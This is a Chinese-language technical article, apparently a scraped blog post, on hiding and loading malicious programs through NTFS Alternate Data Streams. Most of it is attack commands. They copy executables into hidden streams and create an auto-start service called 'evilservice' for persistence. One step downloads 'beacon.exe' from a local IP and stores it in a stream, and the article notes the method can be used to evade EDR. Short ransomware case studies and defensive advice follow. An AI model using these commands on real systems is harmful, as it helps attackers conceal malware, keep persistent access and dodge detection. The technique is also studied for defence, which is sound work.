NTFS交换数据流(ADS)隐匿加载恶意程序技术详解<\/h1>

一、ADS基础概念<\/h2>

NTFS交换数据流(Alternate Data Streams, ADS)是NTFS文件系统的特性，允许文件包含多个数据流：<\/p>

每个文件至少包含一个主数据流(用户可见的文件内容)<\/li>
可以创建多个非主数据流(默认不可见)<\/li>
完整格式：<文件名>:<流名>:<流种类><\/code><\/li>

数据流不显示在常规目录列表中，但占用实际磁盘空间<\/li>
<\/ol>
二、ADS基本操作<\/h2>
1. 查看文件数据流<\/h3>
# 查看特定数据流内容<\/span>
<\/span><\/span>Get-Content .\MyFile.txt -Stream ':$DATA'<\/span>
<\/span><\/span>
<\/span><\/span># 列出文件所有数据流<\/span>
<\/span><\/span>Get-Item -Path .\MyFile.txt -Stream *
<\/span><\/span><\/code><\/pre>2. 创建和写入ADS<\/h3>
# 直接写入数据流<\/span>
<\/span><\/span>Write-Output 'SecretMessage'<\/span> | Set-Content .\MyFile.txt -Stream 'Secret'<\/span>
<\/span><\/span>
<\/span><\/span># 从文件读取内容写入ADS<\/span>
<\/span><\/span>Get-Content .\MyFile.txt | Set-Content .\MyFile.txt -Stream 'Secret1'<\/span>
<\/span><\/span>
<\/span><\/span># 读取ADS内容<\/span>
<\/span><\/span>Get-Content .\MyFile.txt -Stream 'Secret'<\/span>
<\/span><\/span><\/code><\/pre>3. 使用CMD创建ADS<\/h3>
type<\/span> C:\Windows\System32\calc.exe > MyFile.txt:Calculator
<\/span><\/span><\/code><\/pre>三、恶意程序加载技术<\/h2>
1. 通过服务实现持久化<\/h3>
type<\/span> c:\windows\system32\cmd.exe > %CD%file.txt:cmd.exe
<\/span><\/span>sc create evilservice binPath= "\"<\/span>%CD%file.txt:cmd.exe\" \/c echo works > \"<\/span>%CD%works.txt\""<\/span> DisplayName= "evilservice"<\/span> start= auto
<\/span><\/span>sc start evilservice
<\/span><\/span><\/code><\/pre>2. 完整攻击流程<\/h3>


创建基础文件<\/strong><\/p>
echo<\/span> AnyData > MyFile.txt
<\/span><\/span><\/code><\/pre><\/li>

制作隐藏恶意ADS<\/strong><\/p>
Get-Content -Path "C:\windows\system32\cmd.exe"<\/span> -Raw | Set-Content -Path "<\/span>$($PWD.Path)\MyFile.txt:cmd.exe"<\/span> -Stream cmd.exe
<\/span><\/span><\/code><\/pre><\/li>

创建持久化服务<\/strong><\/p>
sc create ADS binPath= "\"<\/span>%CD%\\MyFile.txt:cmd.exe\" \/c echo works > \"<\/span>%CD%\\works.txt\""<\/span> DisplayName= "ADS"<\/span> start= auto
<\/span><\/span><\/code><\/pre><\/li>

执行隐藏指令<\/strong><\/p>
sc start ADS
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
3. 网络加载技术<\/h3>
$tempFile = "<\/span>$($PWD.Path)\temp_download"<\/span>
<\/span><\/span>Invoke-WebRequest -Uri "http:\/\/192.168.56.79:8080\/beacon.exe"<\/span> -OutFile $tempFile
<\/span><\/span>Get-Content -Path $tempFile -Raw | Set-Content -Path "<\/span>$($PWD.Path)\MyFile.txt"<\/span> -Stream test1
<\/span><\/span>Remove-Item $tempFile -Force
<\/span><\/span><\/code><\/pre>四、实际APT组织利用案例<\/h2>
1. WastedLocker勒索软件<\/h3>

以管理员权限运行木马<\/li>
将System32中的随机文件副本写入%APPDATA%<\/li>
通过ADS将自身复制到文件中<\/li>
在%TEMP%中创建WINMM.DLL和WINSAT.EXE副本<\/li>
利用WINMM.DLL从ADS执行勒索软件<\/li>
<\/ul>
2. ALPHA SPIDER勒索软件<\/h3>

在C:\System中部署reverse-ssh可执行文件<\/li>
使用ADS隐藏可执行文件(名为"Host Process for Windows Service")<\/li>
创建恶意服务实现持久化<\/li>
从初始位置删除可执行文件<\/li>
<\/ul>
五、技术限制与注意事项<\/h2>

数据流绑定<\/strong>：ADS与当前系统绑定，复制到其他系统会失效<\/li>
执行限制<\/strong>：无法直接执行ADS中的程序，需通过服务或其他方式间接执行<\/li>
驱动加载<\/strong>：无法从ADS直接加载驱动程序<\/li>
EDR对抗<\/strong>：可用于绕过EDR检测，EDR删除备份文件不影响源文件<\/li>
<\/ol>
六、防御建议<\/h2>

监控异常服务创建行为<\/li>
检查文件ADS内容(使用dir \/r<\/code>或PowerShell命令)<\/li>
限制PowerShell和CMD的执行权限<\/li>
部署能够检测ADS恶意行为的EDR解决方案<\/li>
审计网络下载行为<\/li>
<\/ol>
七、参考资源<\/h2>

ADS利用技术汇总<\/a><\/li>
ALPHA SPIDER勒索软件分析<\/a><\/li>
WastedLocker勒索软件分析<\/a><\/li>
ADS执行技术详解<\/a><\/li>
<\/ol>

NTFS交换数据流(ADS)隐匿加载恶意程序技术详解<\/h1>

二、ADS基本操作<\/h2>

三、恶意程序加载技术<\/h2>

四、实际APT组织利用案例<\/h2>

七、参考资源<\/h2> ADS利用技术汇总<\/a><\/li> ALPHA SPIDER勒索软件分析<\/a><\/li> WastedLocker勒索软件分析<\/a><\/li> ADS执行技术详解<\/a><\/li> <\/ol>

七、参考资源<\/h2>

ADS利用技术汇总<\/a><\/li>
ALPHA SPIDER勒索软件分析<\/a><\/li>
WastedLocker勒索软件分析<\/a><\/li>
ADS执行技术详解<\/a><\/li> <\/ol>